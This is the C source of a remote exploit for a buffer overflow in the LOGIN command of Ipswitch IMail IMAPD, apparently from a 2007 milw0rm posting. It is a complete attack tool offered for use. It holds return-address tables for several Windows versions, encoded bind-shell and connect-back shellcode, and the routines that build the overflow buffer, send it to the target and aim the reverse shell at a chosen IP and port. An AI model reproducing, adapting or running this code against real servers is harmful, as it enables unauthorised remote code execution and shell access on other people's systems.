/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Ipswitch IMAIL Server IMAPD 7.13 - 8.20 exploit
* Site : http://www.ipswitch.com
* Found by : iDEFENSE Security (http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=243)
* ----------------------------------------
* Exploit date : 31.03.2007
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows 2000 SP4 and Windows XP ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info: Well, this is the realization of the IMAIL IMAPd 'LOGIN' buffer overflow vulnerability.
* The version provided by kcope uses SEH overwrite method, which doesn't work on Windows XP SP2,
* so i have written the exploit that overwrites EIP and then execute the shellcode.
*
* I have tested this exploit on the all versions of Imail from 7.13 to 8.20, versions < 7.13 are also vulnerable,
* but i don't have them to test the exploit, Windows 2000 SP4 and Windows XP SP0-SP2.
*
* Here you need to select the OS and the IMAIL version, that is not good, but anyone with some brain can
* easily modify the code to get version of Imail from banner or obtain 'data segment' value without knowing
* the Imail version.
*
* ----------------------------------------
* Thanks to:
* iDEFENSE Security ( http://labs.idefense.com/
* The Metasploit project ( http://metasploit.com )
* kcope ( <kingcope [at] gmx.net> )
* Dreatica-FXP crew ( )
* ----------------------------------------
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32")
void usage(char * s);
void help(char * s);
void logo();
SOCKET do_connect (char *remotehost, int port);
void prepare_shellcode(unsigned char * fsh, int sh, char * cbip, int cbport);
void make_buffer(unsigned char * buf, int itarget, int sh, char * cbip, int cbport, int ifix);
int send_buffer(SOCKET sa, char * buf, char * remotehost, int port);
int validate_args(int port, int sh, int itarget, int fix);
// ###################################################
// # XGetopt.h Version 1.2
// ###################################################
extern int optind, opterr;
extern char *optarg;
int getopt(int argc, char *argv[], char *optstring);
// ##################################################
struct _target{
const char *t ;
unsigned long ret ;
} targets[] =
{ // jmp esp
{"Windows 2000 SP4 ENG [ shell32.dll ]", 0x7850d3bf },
{"Windows XP SP0 ENG [ ntdll.dll ]", 0x77f439e3 },
{"Windows XP SP0 RUS [ ntdll.dll ]", 0x77f5801c },
{"Windows XP SP1 ENG [ ntdll.dll ]", 0x77fa59cc },
{"Windows XP SP1 RUS [ ntdll.dll ]", 0x77fb59cc },
{"Windows XP SP2 ENG [ ntdll.dll ]", 0x7C941eed },
{"Windows XP SP2 RUS [ ntdll.dll ]", 0x7C941eed },
{"Windows XP SP2 RUS(no patches) [ shell32.dll ]", 0x7C82385D },
{NULL, 0x00000000 }
};
struct _imail{
const char * name ;
unsigned long fix;
}imailfix[] =
{
// address to data segment in Mailbox
{"Ipswitch IMAIL Server IMAPD 7.04 - 8.05HF3", 0x10034000},
{"Ipswitch IMAIL Server IMAPD 8.10 - 8.11 ", 0x1002f000},
{"Ipswitch IMAIL Server IMAPD 8.12 - 8.20 ", 0x10031000},
{NULL, 0x00000000}
};
struct _shellcode{
const char * name;
char * shellcode;
} shellcodes[]={ // bad charachters: 0x00 0x03 0x0A 0x0C 0x22 0x5C (and more)
{"Spawn bindshell on port 4444",
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x63"
"\xb4\x7d\x58\x83\xeb\xfc\xe2\xf4\x9f\xde\x96\x15\x8b\x4d\x82\xa7"
"\x9c\xd4\xf6\x34\x47\x90\xf6\x1d\x5f\x3f\x01\x5d\x1b\xb5\x92\xd3"
"\x2c\xac\xf6\x07\x43\xb5\x96\x11\xe8\x80\xf6\x59\x8d\x85\xbd\xc1"
"\xcf\x30\xbd\x2c\x64\x75\xb7\x55\x62\x76\x96\xac\x58\xe0\x59\x70"
"\x16\x51\xf6\x07\x47\xb5\x96\x3e\xe8\xb8\x36\xd3\x3c\xa8\x7c\xb3"
"\x60\x98\xf6\xd1\x0f\x90\x61\x39\xa0\x85\xa6\x3c\xe8\xf7\x4d\xd3"
"\x23\xb8\xf6\x28\x7f\x19\xf6\x18\x6b\xea\x15\xd6\x2d\xba\x91\x08"
"\x9c\x62\x1b\x0b\x05\xdc\x4e\x6a\x0b\xc3\x0e\x6a\x3c\xe0\x82\x88"
"\x0b\x7f\x90\xa4\x58\xe4\x82\x8e\x3c\x3d\x98\x3e\xe2\x59\x75\x5a"
"\x36\xde\x7f\xa7\xb3\xdc\xa4\x51\x96\x19\x2a\xa7\xb5\xe7\x2e\x0b"
"\x30\xe7\x3e\x0b\x20\xe7\x82\x88\x05\xdc\x6c\x04\x05\xe7\xf4\xb9"
"\xf6\xdc\xd9\x42\x13\x73\x2a\xa7\xb5\xde\x6d\x09\x36\x4b\xad\x30"
"\xc7\x19\x53\xb1\x34\x4b\xab\x0b\x36\x4b\xad\x30\x86\xfd\xfb\x11"
"\x34\x4b\xab\x08\x37\xe0\x28\xa7\xb3\x27\x15\xbf\x1a\x72\x04\x0f"
"\x9c\x62\x28\xa7\xb3\xd2\x17\x3c\x05\xdc\x1e\x35\xea\x51\x17\x08"
"\x3a\x9d\xb1\xd1\x84\xde\x39\xd1\x81\x85\xbd\xab\xc9\x4a\x3f\x75"
"\x9d\xf6\x51\xcb\xee\xce\x45\xf3\xc8\x1f\x15\x2a\x9d\x07\x6b\xa7"
"\x16\xf0\x82\x8e\x38\xe3\x2f\x09\x32\xe5\x17\x59\x32\xe5\x28\x09"
"\x9c\x64\x15\xf5\xba\xb1\xb3\x0b\x9c\x62\x17\xa7\x9c\x83\x82\x88"
"\xe8\xe3\x81\xdb\xa7\xd0\x82\x8e\x31\x4b\xad\x30\x93\x3e\x79\x07"
"\x30\x4b\xab\xa7\xb3\xb4\x7d\x58"
},
{"ConnectBack shell (set the CBIP and CBPort)",
/* thx to the one who wrote it, taken from kcope exploit */
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x49\x82\xCE\x49"
"\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x59\xC2\xC2\xC2"
"\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\x9D\x96\x3D\xD4\x49"
"\x2A\xA8\xC6\x9B\x2A\x40\xC2\xC2\xC2\x20\x3B\x43\x2E\x52\xC3\xC2"
"\xC2\x96\xAA\xC3\xC3\xC2\xC2\x3D\x94\xD2\x92\x92\x92\x92\x82\x92"
"\x82\x92\x3D\x94\xD6\x49\x1A\xAA\xBD\xC2\xC2\xC3\xAA\xC0\xC2\xC2"
"\xF7\x49\x0E\xA8\xD2\x93\x91\x3D\x94\xDA\x47\x02\xB7\x88\xAA\xA1"
"\xAF\xA6\xC2\x4B\xA4\xF2\x41\x2E\x96\x4F\xFE\xE6\xA8\xD7\x9B\x69"
"\x20\x3F\x04\x86\xE6\xD2\x86\x3C\x86\xE6\xFF\x4B\x9E\xE6\x8A\x4B"
"\x9E\xE6\x8E\x4B\x9E\xE6\x92\x4F\x86\xE6\xD2\x96\x92\x93\x93\x93"
"\xA8\xC3\x93\x93\x3D\xB4\xF2\x93\x3D\x94\xC6\x49\x0E\xA8\x3D\x3D"
"\xF3\x3D\x94\xCA\x91\x3D\x94\xDE\x3D\x94\xCE\x93\x94\x49\x87\xFE"
"\x49\x96\xEA\xBA\xC1\x17\x90\x49\xB0\xE2\xC1\x37\xF1\x0B\x8B\x83"
"\x6F\xC1\x07\xF1\x19\xCD\x7C\xD2\xF8\x14\xB6\xCA\x03\x09\xCF\xC1"
"\x18\x82\x29\x33\xF9\xDD\xB7\x25\x98\x49\x98\xE6\xC1\x1F\xA4\x49"
"\xCE\x89\x49\x98\xDE\xC1\x1F\x49\xC6\x49\xC1\x07\x69\x9C\x9B\x01"
"\x2A\xC2\x3D\x3D\x3D\x4C\x8C\xCC\x2E\xB0\x3C\x71\xD4\x6F\x1B\xC7"
"\x0C\xBC\x1A\x20\xB1\x09\x2F\x3E\xF9\x1B\xCB\x37\x6F\x2E\x3B\x68"
"\xA2\x25\xBB\x04\xBB"
},
{NULL , NULL }
};
// jump to our shellcode
unsigned char jmpcode[] = "\x8B\xc4\x66\x2D\xEC\x01\x66\x81\xec\xf0\x02\xFF\xE0";
int main(int argc, char **argv)
{
char * remotehost=NULL, * cbip=NULL;
char def_cbip[]="127.0.0.1";
char temp1[100], temp2[100];
int cbport, port, itarget=0, sh=0, fix=0;
SOCKET s;
char c;
logo();
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
if(argc<2)
{
usage(argv[0]);
WSACleanup();
return -1;
}
// set defaults
cbport=4444;
port=143;
// ------------
while((c = getopt(argc, argv, "h:p:s:t:I:P:f:"))!= EOF)
{
switch (c)
{
case 'h':
remotehost=optarg;
break;
case 's':
sscanf(optarg, "%d", &sh);
sh--;
break;
case 't':
sscanf(optarg, "%d", &itarget);
itarget--;
break;
case 'f':
sscanf(optarg, "%d", &fix);
fix--;
break;
case 'p':
sscanf(optarg, "%d", &port);
break;
case 'P':
sscanf(optarg, "%d", &cbport);
break;
case 'I':
cbip=optarg;
break;
default:
usage(argv[0]);
return -1;
}
}
if(remotehost==NULL)
{
usage(argv[0]);
WSACleanup();
return -1;
}
if((sh==1)&&(cbip==NULL)) cbip = def_cbip ;
if(validate_args(port, sh, itarget, fix)==-1) return -1;
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
memset(temp1, '\x20' , 58 - strlen(remotehost) -1);
printf(" # Host : %s%s# \n", remotehost, temp1);
sprintf(temp2, "%d", port);
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Port : %s%s# \n", temp2, temp1);
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
sprintf(temp2, "%s", shellcodes[sh].name );
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Shellcde: %s%s# \n", temp2, temp1);
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1);
printf(" # Target : %s%s# \n", targets[itarget].t, temp1);
if(sh==1)
{
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(cbip) -1);
printf(" # CB IP : %s%s# \n", cbip, temp1);
sprintf(temp2, "%d", cbport);
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # CB port : %s%s# \n", temp2, temp1);
}
printf(" # ------------------------------------------------------------------- # \n");
printf("[+] Checking if server is online... ");
fflush(stdout);
s=do_connect(remotehost, port);
if(s==-1)
{
fprintf(stdout, "failed\n");
return 0;
}
closesocket(s);
printf("SUCCESS!\n");
char buf[1000];
memset(buf,0,sizeof(buf));
printf("[+] Constructing attacking buffer... ");
fflush(stdout);
make_buffer((unsigned char *)buf,itarget,sh,cbip,cbport,fix);
printf("done\n");
SOCKET sa;
sa=do_connect(remotehost, port);
if(sa==-1)
{
fprintf(stdout, "[-] Connection failed to server %s\n", remotehost);
return -1;
}
printf("[+] Sending %d bytes of buffer to server\n", strlen(buf));
if(send_buffer(sa, buf,remotehost,port)==0)
{
fprintf(stdout, "[-] Cannot send the buffer to server %s\n", remotehost);
return -1;
}
printf("[+] Buffer sent\n");
closesocket(sa);
if(sh==0)
{
printf("[+] Connect to %s:%d\n", remotehost, 7915);
}else
{
printf("[+] The shell should arrive to %s:%d", cbip, cbport);
}
WSACleanup();
return 0;
}
int validate_args(int port, int sh, int itarget, int fix)
{
int i=0,x=0;
for(i=0;shellcodes[i].name;i++)if(i==sh)x=1;
if(x==0)
{
printf("[-] The shellcode number is invalid\n");
return -1;
}
x=0;
for(i=0;targets[i].t;i++)if(i==itarget)x=1;
if(x==0)
{
printf("[-] The target is invalid\n");
return -1;
}
x=0;
for(i=0;imailfix[i].name;i++)if(i==fix)x=1;
if(x==0)
{
printf("[-] The imail version is invalid\n");
return -1;
}
if(port<=0)
{
printf("[-] The port is invalid\n");
return -1;
}
return 1;
}
SOCKET do_connect (char *remotehost, int port)
{
static struct hostent *host;
static struct sockaddr_in addr;
static int done=0;
SOCKET s;
if (done != 1)
{
host = gethostbyname(remotehost);
if (!host)
{
perror("[-] gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
closesocket(s);
perror("socket() failed");
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
closesocket(s);
return -1;
}
done=1;
return s;
}
void prepare_shellcode(unsigned char * fsh, int sh, char * cbip, int cbport)
{
memcpy(fsh, shellcodes[sh].shellcode, strlen(shellcodes[sh].shellcode));
if(sh==1)
{
static struct hostent *host = gethostbyname(cbip);
static struct sockaddr_in addr;
addr.sin_addr = *(struct in_addr*)host->h_addr;
fsh[111] = (addr.sin_addr.S_un.S_un_b.s_b1) ^ 0xc2;
fsh[112] = (addr.sin_addr.S_un.S_un_b.s_b2) ^ 0xc2;
fsh[113] = (addr.sin_addr.S_un.S_un_b.s_b3) ^ 0xc2;
fsh[114] = (addr.sin_addr.S_un.S_un_b.s_b4) ^ 0xc2;
fsh[118] = ((cbport >> 8) & 0xff) ^ 0xc2;
fsh[119] = ((cbport ) & 0xff) ^ 0xc2;
}
}
void make_buffer(unsigned char * buf, int itarget, int sh, char * cbip, int cbport, int ifix)
{
// prepare shellcode
unsigned char * fsh;
fsh = (unsigned char *) malloc ((strlen(shellcodes[sh].shellcode)+1) );
memset(fsh, 0, (strlen(shellcodes[sh].shellcode)+1));
prepare_shellcode(fsh, sh, cbip, cbport);
// -----------------
// init buffer
memset(buf,0,sizeof(buf));
unsigned char * cp = buf;
*cp++ = '@';
*cp++ = '\x90';
*cp++ = '\x90';
*cp++ = '\x90';
*cp++ = '\x90';
// write shellcode
memcpy(cp, fsh, strlen((char *)fsh) );
cp+=strlen((char *)cp);
memset(cp, 'A', 488-strlen((char *)fsh));
cp+=strlen((char *)cp);
// set EIP
*cp++ = (unsigned char)((targets[itarget].ret ) & 0xff);
*cp++ = (unsigned char)((targets[itarget].ret >> 8) & 0xff);
*cp++ = (unsigned char)((targets[itarget].ret >> 16) & 0xff);
*cp++ = (unsigned char)((targets[itarget].ret >> 24) & 0xff);
*cp++ = '\x41';
*cp++ = '\x41';
*cp++ = '\x41';
*cp++ = '\xeb';
*cp++ = '\x03';
*cp++ = (unsigned char)((imailfix[ifix].fix >> 8) & 0xff);
*cp++ = (unsigned char)((imailfix[ifix].fix >> 16) & 0xff);
*cp++ = (unsigned char)((imailfix[ifix].fix >> 24) & 0xff);
// add jump back
memcpy(cp, jmpcode, strlen((char *)jmpcode));
// -----------
}
int send_buffer(SOCKET s, char * buf, char * remotehost, int port)
{
char bufmax[1024];
recv(s, bufmax, sizeof(bufmax),0);
char sendbuf[1000];
memset(sendbuf, 0, sizeof(sendbuf));
strcat(sendbuf, "a001 LOGIN \"");
strcat(sendbuf, buf);
strcat(sendbuf, "\" password\r\n");
int sentbytes=send(s, sendbuf, (int)strlen(sendbuf),0);
if(sentbytes<(int)strlen(sendbuf)) return 0;
return 1;
}
void usage(char * s)
{
printf(" Usage: %s -h <host> [-p <port>] [-s <shellcode>] [-t <target>] [-f <imail>] [-I <cb IP>] [-P <cb port>]\n\n", s);
printf(" ----------------------------------------------------------------------- \n");
printf(" Arguments:\n");
printf(" -h host to connect \n");
printf(" -p port (default: 143 )\n");
printf(" -s shellcode (default: 1 )\n");
printf(" -t target (default: 1 )\n");
printf(" -f Imail version (default: 1 )\n");
printf(" -I connect back IP (default: 127.0.0.1)\n");
printf(" -P connect back port(default: 4444 )\n");
printf("\n");
printf(" Shellcodes:\n");
for(int i=0; shellcodes[i].name!=0;i++)
{
printf(" %d. %s\n",i+1,shellcodes[i].name);
}
printf("\n");
printf(" Targets:\n\n");
int j;
for(j=0; targets[j].t!=0;j++)
{
printf(" %d. %s\n",j+1,targets[j].t);
}
printf("\n");
printf(" Imail version:\n\n");
for(j=0; imailfix[j].name!=0;j++)
{
printf(" %d. %s\n",j+1,imailfix[j].name);
}
printf("\n");
printf(" ----------------------------------------------------------------------- \n");
}
// ###################################################
// # XGetopt.h Version 1.2
// ###################################################
char *optarg; // global argument pointer
int optind = 0; // global argv index
int getopt(int argc, char *argv[], char *optstring)
{
static char *next = NULL;
if (optind == 0)
next = NULL;
optarg = NULL;
if (next == NULL || *next == '\0')
{
if (optind == 0)
optind++;
if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
{
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
if (strcmp(argv[optind], "--") == 0)
{
optind++;
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
next = argv[optind];
next++; // skip past -
optind++;
}
char c = *next++;
char *cp = strchr(optstring, c);
if (cp == NULL || c == ':')
return '?';
cp++;
if (*cp == ':')
{
if (*next != '\0')
{
optarg = next;
next = NULL;
}
else if (optind < argc)
{
optarg = argv[optind];
optind++;
}
else
{
return '?';
}
}
return c;
}
// ###################################################
void logo()
{
printf(" ####################################################################### \n");
printf(" # ____ __ _ ______ __ _____ #\n");
printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n");
printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n");
printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n");
printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n");
printf(" # crew #\n");
printf(" ####################################################################### \n");
printf(" # Exploit : Ipswitch IMAIL Server IMAPD 7.13 - 8.20 exploit # \n");
printf(" # Version : 1.0 # \n");
printf(" # System : Windows 2000 SP4, Windows XP ALL # \n");
printf(" # Date : 31.03.2007 # \n");
printf(" # ------------------------------------------------------------------- # \n");
}
// milw0rm.com [2007-04-01]
